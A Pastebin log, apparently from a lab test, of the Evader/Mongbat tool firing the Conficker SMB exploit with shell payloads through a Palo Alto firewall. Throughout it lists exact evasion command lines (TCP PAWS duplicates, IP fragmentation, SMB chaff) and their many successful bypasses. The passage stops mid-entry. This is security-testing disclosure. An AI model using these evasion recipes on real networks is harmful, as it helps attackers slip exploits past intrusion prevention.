Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Palo Alto Networks Evader Log 7.0.3 December 2015
- done after applying Best practices as recommended by Palo Alto here:
- https://www.paloaltonetworks.com/documentation/70/pan-os/pan-os/threat-prevention/best-practices-for-securing-your-network-from-layer-4-and-layer-7-evasions.html
- configured with the strictest profiles possible (IPS,AV,...)
- PA IP is 10.62.90.3
- Victim ip 10.35.1.207
- attacker (evader) 10.62.90.110-120
- begin Log File
- Running exploit with command "ruby mongbat.rb --uid=webgui2_8000 --attack=conficker --payload=shell --check_victim=false --iface=eth0 --attacker=10.62.90.110 --victim=10.35.1.207 --gw=10.62.90.3 --mode=random --time=43200 --workers=10 --min_evasions=2 --max_evasions=3 --passthrough --verifydelay=1000"
- 2015-11-29 14:25:48 INFO Using binary /root/evader/evader version 2013.2.586 ( x86, o, evc4 )
- 2015-11-29 14:25:48 INFO Victim check disabled - will NOT notice if victim is no longer running
- 2015-11-29 14:25:50 INFO Using rand seed cMvMFqDfRtA=
- 2015-11-29 14:25:50 WARN evader is already running ; this may cause VICTIM CHECK FAILED messages!
- 2015-11-29 14:25:50 INFO External Validator: /root/evader/externals/conficker_validator.rb: Validate Conficker against Windows XP SP2
- Starting evasions generator: Random evasions generator (Evasion adding percentage is 0.0028169014084507044)
- 0 runs averaging 0.00 runs / second ; progress: 1/43200.........................
- 25 runs averaging 4.00 runs / second ; progress: 6/43200.......2015-11-29 14:25:58 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=52333 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=h1rO1S4WuZU --evasion=[smb_openpipe,msrpc_req]tcp_paws,"2","268435455","zero" --evasion=[smb_connect,msrpc_req]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
- Info: Using random seed h1rO1S4WuZW
- The following evasions are applied from stage smb_connect to msrpc_req:
- - TCP timestamps echo reply value is sent in the wrong endianness
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has 0x00 bytes as payload
- Info: NetBIOS connection 10.62.90.117:52333 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...........
- 44 runs averaging 3.90 runs / second ; progress: 11/43200...............
- 59 runs averaging 3.62 runs / second ; progress: 16/43200...............2015-11-29 14:26:10 INFO
- Success. (10.62.90.119):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=33234 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=cC4uchCIvqM --evasion=[msrpc_bind,end]tcp_paws,"25%","5","random_alphanum" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"3","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed cC4uchCIvqN
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - Add a random alphanumeric urgent data byte to every 3 TCP segment.
- The following evasions are applied from stage msrpc_bind to end:
- - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has random alphanumeric bytes as payload
- Info: NetBIOS connection 10.62.90.119:33234 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- .2015-11-29 14:26:10 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=59537 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=ePCbpjJvBgk --evasion=[start,end]tcp_inittsopt,"enable","normal" --evasion=[start,end]tcp_paws,"3","191194982","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed ePCbpjJvBgl
- - TCP timestamps enabled, initial TCP timestamp is set to zero.
- - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 191194982> and has 0x00 bytes as payload
- Info: NetBIOS connection 10.62.90.116:59537 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ............
- 89 runs averaging 4.17 runs / second ; progress: 21/43200..............................
- 119 runs averaging 4.51 runs / second ; progress: 26/43200..........................
- 145 runs averaging 4.61 runs / second ; progress: 31/43200....2015-11-29 14:26:23 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=34345 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=GmSliZQobbI --evasion=[netbios_connect,smb_opentree]ipv4_frag,"80" --evasion=[netbios_connect,smb_opentree]ipv4_order,"lastfirst" --evasion=[smb_opentree,end]tcp_paws,"75%","5","random" --verifydelay=1000 --payload=shell
- Info: Using random seed GmSliZQobbI
- The following evasions are applied from stage netbios_connect to smb_opentree:
- - IPv4 fragments with at most 80 bytes per fragment
- - IPv4 fragments are sent in correct order except that the last fragment comes first
- The following evasions are applied from stage smb_opentree to end:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has random bytes as payload
- Info: NetBIOS connection 10.62.90.112:34345 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...............
- 165 runs averaging 4.52 runs / second ; progress: 36/43200...................
- 184 runs averaging 4.43 runs / second ; progress: 42/43200.....................
- 205 runs averaging 4.41 runs / second ; progress: 47/43200.......................
- 228 runs averaging 4.42 runs / second ; progress: 52/43200.2015-11-29 14:26:43 INFO
- Success. (10.62.90.114):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=61332 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=MTOzOSDi8Jw --evasion=[start,end]ipv4_opt,"8","inc","shuffletcp" --evasion=[smb_connect,msrpc_bind]smb_chaff,"21","write_flag","rand" --evasion=[msrpc_bind,end]tcp_paws,"1","268435455","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed MTOzOSDi8Jw
- - Every 8th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has shuffled TCP payload
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - Before every 21th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random payload
- The following evasions are applied from stage msrpc_bind to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has 0x00 bytes as payload
- Info: NetBIOS connection 10.62.90.114:61332 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ................
- 246 runs averaging 4.35 runs / second ; progress: 57/43200.........
- 255 runs averaging 4.14 runs / second ; progress: 62/43200.
- 256 runs averaging 3.84 runs / second ; progress: 67/432002015-11-29 14:26:58 INFO
- Success. (10.62.90.119):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=29527 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=GOvj/FZON2U --evasion=[smb_connect,smb_opentree]smb_decoytrees,"7","5","7","random" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"1","268435454","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed GOvj/FZON2U
- The following evasions are applied from stage smb_connect to smb_opentree:
- - Before normal SMB writes, 7 SMB trees are opened and 5 writes are performed to them. The write payload is 7 random bytes.
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has random alphanumeric bytes as payload
- Info: NetBIOS connection 10.62.90.119:29527 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...........
- 268 runs averaging 3.74 runs / second ; progress: 72/43200..................
- 286 runs averaging 3.73 runs / second ; progress: 77/43200........2015-11-29 14:27:10 INFO
- Success. (10.62.90.114):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=22237 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=qVWS+7bkAvY --evasion=[smb_connect,smb_opentree]ipv4_opt,"75%","inc","random" --evasion=[smb_openpipe,end]tcp_paws,"75%","9","alphanumrandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed qVWS+7bkAva
- The following evasions are applied from stage smb_connect to smb_opentree:
- - 75% probability to send a duplicate IPv4 packet with an incrementing DWORD in the options field.
- The duplicate packet has random bytes as payload
- The following evasions are applied from stage smb_openpipe to end:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has original payload with alphanumeric bytes randomized
- Info: NetBIOS connection 10.62.90.114:22237 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ......
- 301 runs averaging 3.68 runs / second ; progress: 82/43200.......
- 308 runs averaging 3.55 runs / second ; progress: 87/43200.......
- 315 runs averaging 3.43 runs / second ; progress: 92/43200.........
- 324 runs averaging 3.35 runs / second ; progress: 97/43200.........2015-11-29 14:27:31 INFO
- Success. (10.62.90.119):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=33045 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=6Pjh3NY8nJk --evasion=[smb_connect,msrpc_bind]ipv4_frag,"1472" --evasion=[msrpc_bind,end]tcp_paws,"75%","4","alphanumrandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed 6Pjh3NY8nJn
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - IPv4 fragments with at most 1472 bytes per fragment
- The following evasions are applied from stage msrpc_bind to end:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has original payload with alphanumeric bytes randomized
- Info: NetBIOS connection 10.62.90.119:33045 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .
- 335 runs averaging 3.29 runs / second ; progress: 102/43200.
- 336 runs averaging 3.15 runs / second ; progress: 107/43200....
- 340 runs averaging 3.04 runs / second ; progress: 112/43200....
- 344 runs averaging 2.94 runs / second ; progress: 117/43200.....
- 349 runs averaging 2.86 runs / second ; progress: 122/43200..
- 351 runs averaging 2.77 runs / second ; progress: 127/43200...
- 354 runs averaging 2.68 runs / second ; progress: 132/43200
- 354 runs averaging 2.59 runs / second ; progress: 137/43200.....
- 359 runs averaging 2.53 runs / second ; progress: 142/43200.......
- 366 runs averaging 2.49 runs / second ; progress: 147/43200....
- 370 runs averaging 2.44 runs / second ; progress: 152/43200.....
- 375 runs averaging 2.39 runs / second ; progress: 157/43200..
- 377 runs averaging 2.33 runs / second ; progress: 162/43200.....
- 382 runs averaging 2.29 runs / second ; progress: 167/43200......
- 388 runs averaging 2.26 runs / second ; progress: 172/432002015-11-29 14:28:43 INFO
- Success. (10.62.90.113):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=63628 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=nbC99GjwshU --evasion=[msrpc_bind,msrpc_req]smb_seg,"6" --evasion=[smb_openpipe,end]smb_writeandxpad,"1023","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed nbC99GjwshW
- The following evasions are applied from stage smb_openpipe to end:
- - 1023 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random alphanumeric bytes.
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - SMB writes are segmented to contain at most 6 bytes of payload.
- Info: NetBIOS connection 10.62.90.113:63628 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- .
- 390 runs averaging 2.20 runs / second ; progress: 177/43200
- 390 runs averaging 2.14 runs / second ; progress: 182/43200
- 390 runs averaging 2.09 runs / second ; progress: 187/43200
- 390 runs averaging 2.03 runs / second ; progress: 192/43200
- 390 runs averaging 1.98 runs / second ; progress: 197/43200
- 390 runs averaging 1.93 runs / second ; progress: 202/43200
- 390 runs averaging 1.88 runs / second ; progress: 207/43200
- 390 runs averaging 1.84 runs / second ; progress: 212/43200
- 390 runs averaging 1.80 runs / second ; progress: 217/43200
- 390 runs averaging 1.76 runs / second ; progress: 222/43200
- 390 runs averaging 1.72 runs / second ; progress: 227/43200
- 390 runs averaging 1.68 runs / second ; progress: 232/43200
- 390 runs averaging 1.64 runs / second ; progress: 237/43200
- 390 runs averaging 1.61 runs / second ; progress: 242/43200
- 390 runs averaging 1.58 runs / second ; progress: 247/43200
- 390 runs averaging 1.55 runs / second ; progress: 252/43200
- 390 runs averaging 1.52 runs / second ; progress: 257/43200
- 390 runs averaging 1.49 runs / second ; progress: 262/43200
- 390 runs averaging 1.46 runs / second ; progress: 267/43200
- 390 runs averaging 1.43 runs / second ; progress: 272/43200
- 390 runs averaging 1.41 runs / second ; progress: 277/43200
- 390 runs averaging 1.38 runs / second ; progress: 282/43200
- 390 runs averaging 1.36 runs / second ; progress: 287/43200
- 390 runs averaging 1.33 runs / second ; progress: 292/43200
- 390 runs averaging 1.31 runs / second ; progress: 297/43200
- 390 runs averaging 1.29 runs / second ; progress: 302/43200
- 390 runs averaging 1.27 runs / second ; progress: 307/43200Pid 8487 timed out - killed
- 2015-11-29 14:31:01 INFO
- Timed out (10.62.90.117):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=45741 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=LSFebZF03gA --evasion=[smb_opentree,end]smb_decoytrees,"6","2","3","random_alphanum" --evasion=[msrpc_bind,end]tcp_urgent,"8","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed LSFebZF03gA
- The following evasions are applied from stage smb_opentree to end:
- - Before normal SMB writes, 6 SMB trees are opened and 2 writes are performed to them. The write payload is 3 random alphanumeric bytes.
- The following evasions are applied from stage msrpc_bind to end:
- - Add a random alphaurgent data byte to every 8 TCP segment.
- Info: NetBIOS connection 10.62.90.117:45741 -> 10.35.1.207:445
- Terminated
- 391 runs averaging 1.25 runs / second ; progress: 312/43200
- 391 runs averaging 1.23 runs / second ; progress: 317/43200Pid 8714 timed out - killed
- 2015-11-29 14:31:09 INFO
- Timed out (10.62.90.115):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=26549 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=Q4MPR/Ipdco --evasion=[smb_openpipe,msrpc_req]tcp_segvar,"8","38910" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"2","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed Q4MPR/Ipdcp
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Add a zero urgent data byte to every 2 TCP segment.
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - TCP packets are segmented to contain between 8 and 38910 bytes of payload.
- Info: NetBIOS connection 10.62.90.115:26549 -> 10.35.1.207:445
- Terminated
- 392 runs averaging 1.22 runs / second ; progress: 322/43200...
- 395 runs averaging 1.21 runs / second ; progress: 327/43200.2015-11-29 14:31:20 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=61076 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=ks72eUXp6pg --evasion=[start,netbios_connect]ipv4_frag,"40" --evasion=[smb_openpipe,end]tcp_paws,"1","10","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed ks72eUXp6pi
- The following evasions are applied from stage start to netbios_connect:
- - IPv4 fragments with at most 40 bytes per fragment
- The following evasions are applied from stage smb_openpipe to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 10> and has random alphanumeric bytes as payload
- Info: NetBIOS connection 10.62.90.117:61076 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- 397 runs averaging 1.19 runs / second ; progress: 332/43200.........
- 406 runs averaging 1.20 runs / second ; progress: 337/43200........
- 414 runs averaging 1.21 runs / second ; progress: 342/43200.Pid 9734 timed out - killed
- 2015-11-29 14:31:33 INFO
- Timed out (10.62.90.111):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=55680 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=gb9TlKpcDKQ --evasion=[netbios_connect,smb_opentree]netbios_chaff,"21","empty_unspec|small_unspec|http_post|msrpc_req" --evasion=[netbios_connect,end]tcp_recv_window,"130051" --evasion=[smb_openpipe,end]tcp_urgent,"75%","random" --verifydelay=1000 --payload=shell
- Info: Using random seed gb9TlKpcDKS
- The following evasions are applied from stage netbios_connect to end:
- - TCP receive window is set to at most 130051 bytes.
- The following evasions are applied from stage netbios_connect to smb_opentree:
- - Before every 21th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload.
- The following evasions are applied from stage smb_openpipe to end:
- - 75% probability to add a random urgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.111:55680 -> 10.35.1.207:445
- Terminated
- .............
- 429 runs averaging 1.23 runs / second ; progress: 347/43200Pid 9930 timed out - killed
- 2015-11-29 14:31:38 INFO
- Timed out (10.62.90.118):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=52808 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=e5vVqTJ0DxU --evasion=[start,smb_openpipe]ipv4_frag,"1480" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"50%","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed e5vVqTJ0DxV
- The following evasions are applied from stage start to smb_openpipe:
- - IPv4 fragments with at most 1480 bytes per fragment
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - 50% probability to add a random alphanumeric urgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.118:52808 -> 10.35.1.207:445
- Terminated
- ...2015-11-29 14:31:40 INFO
- Success. (10.62.90.115):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=27985 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=g2MlQoI2/qU --evasion=[smb_connect,end]tcp_paws,"5","6","alphanumrandomized" --evasion=[msrpc_req,end]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
- Info: Using random seed g2MlQoI2/qW
- The following evasions are applied from stage smb_connect to end:
- - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage msrpc_req to end:
- - TCP timestamps echo reply value is sent in the wrong endianness
- Info: NetBIOS connection 10.62.90.115:27985 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ..
- 436 runs averaging 1.24 runs / second ; progress: 353/43200
- 436 runs averaging 1.22 runs / second ; progress: 358/43200Pid 10305 timed out - killed
- 2015-11-29 14:31:51 INFO
- Timed out (10.62.90.112):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=18240 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=lvOqSj7TLSw --evasion=[smb_connect,msrpc_req]ipv4_frag,"1480" --evasion=[msrpc_bind,msrpc_req]tcp_paws,"8","268435454","random" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"25%","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed lvOqSj7TLSy
- The following evasions are applied from stage smb_connect to msrpc_req:
- - IPv4 fragments with at most 1480 bytes per fragment
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - 25% probability to add a random alphanumeric urgent data byte to a TCP segment.
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - Every 8th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has random bytes as payload
- Info: NetBIOS connection 10.62.90.112:18240 -> 10.35.1.207:445
- Terminated
- ....
- 441 runs averaging 1.22 runs / second ; progress: 363/43200.........
- 450 runs averaging 1.22 runs / second ; progress: 368/43200...2015-11-29 14:32:00 INFO
- Success. (10.62.90.115):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=11394 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=zKgv1BqIzcM --evasion=[smb_opentree,msrpc_req]netbios_chaff,"3","empty_unspec|empty_keepalive|broken_length" --evasion=[smb_connect,msrpc_req]smb_decoytrees,"5","5","2","random_msrpcbind" --evasion=[msrpc_bind,end]tcp_paws,"3","190383014","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed zKgv1BqIzcP
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Before normal SMB writes, 5 SMB trees are opened and 5 writes are performed to them. The write payload is 2 bytes of MSRPC bind-like data.
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Before every 3th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
- The following evasions are applied from stage msrpc_bind to end:
- - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 190383014> and has original payload with alphabetic bytes randomized
- Info: NetBIOS connection 10.62.90.115:11394 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .....
- 459 runs averaging 1.23 runs / second ; progress: 373/43200...2015-11-29 14:32:04 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=60421 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=bHcAuyx6Oms --evasion=[smb_openpipe,msrpc_bind]smb_fnameobf,"change_case" --evasion=[smb_connect,msrpc_req]tcp_paws,"1","17330454","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed bHcAuyx6Omt
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 17330454> and has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - The SMB filename is obfuscated:
- * Random characters case is changed
- Info: NetBIOS connection 10.62.90.117:60421 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ......
- 469 runs averaging 1.24 runs / second ; progress: 378/43200
- 469 runs averaging 1.23 runs / second ; progress: 383/43200
- 469 runs averaging 1.21 runs / second ; progress: 388/43200.........
- 478 runs averaging 1.22 runs / second ; progress: 393/43200....Pid 10878 timed out - killed
- 2015-11-29 14:32:25 INFO
- Timed out (10.62.90.110):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=56599 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=23M8v1hEoSg --evasion=[smb_opentree,msrpc_bind]netbios_chaff,"50%","empty_unspec|small_unspec|http_get" --evasion=[smb_openpipe,end]tcp_urgent,"1","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed 23M8v1hEoSj
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - 50% probability to send a chaff NetBIOS message before an actual NetBIOS message. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload.
- The following evasions are applied from stage smb_openpipe to end:
- - Add a random alphanumeric urgent data byte to every 1 TCP segment.
- Info: NetBIOS connection 10.62.90.110:56599 -> 10.35.1.207:445
- Terminated
- .....2015-11-29 14:32:28 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=36269 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=GVmZYMBCo6c --evasion=[smb_connect,end]ipv4_frag,"464" --evasion=[smb_connect,msrpc_req]tcp_paws,"50%","116466038","zero" --evasion=[smb_openpipe,msrpc_req]tcp_segvar,"8","65534" --verifydelay=1000 --payload=shell
- Info: Using random seed GVmZYMBCo6c
- The following evasions are applied from stage smb_connect to end:
- - IPv4 fragments with at most 464 bytes per fragment
- The following evasions are applied from stage smb_connect to msrpc_req:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 116466038> and has 0x00 bytes as payload
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - TCP packets are segmented to contain between 8 and 65534 bytes of payload.
- Info: NetBIOS connection 10.62.90.112:36269 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- .
- 490 runs averaging 1.23 runs / second ; progress: 398/43200..Pid 10949 timed out - killed
- 2015-11-29 14:32:30 INFO
- Timed out (10.62.90.114):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=44674 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=wBfabVk6tio --evasion=[smb_opentree,smb_openpipe]smb_decoytrees,"1","4","402","zero" --evasion=[smb_opentree,msrpc_bind]tcp_paws,"21","72020197","alpharandomized" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"1","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed wBfabVk6tir
- The following evasions are applied from stage smb_opentree to msrpc_bind:
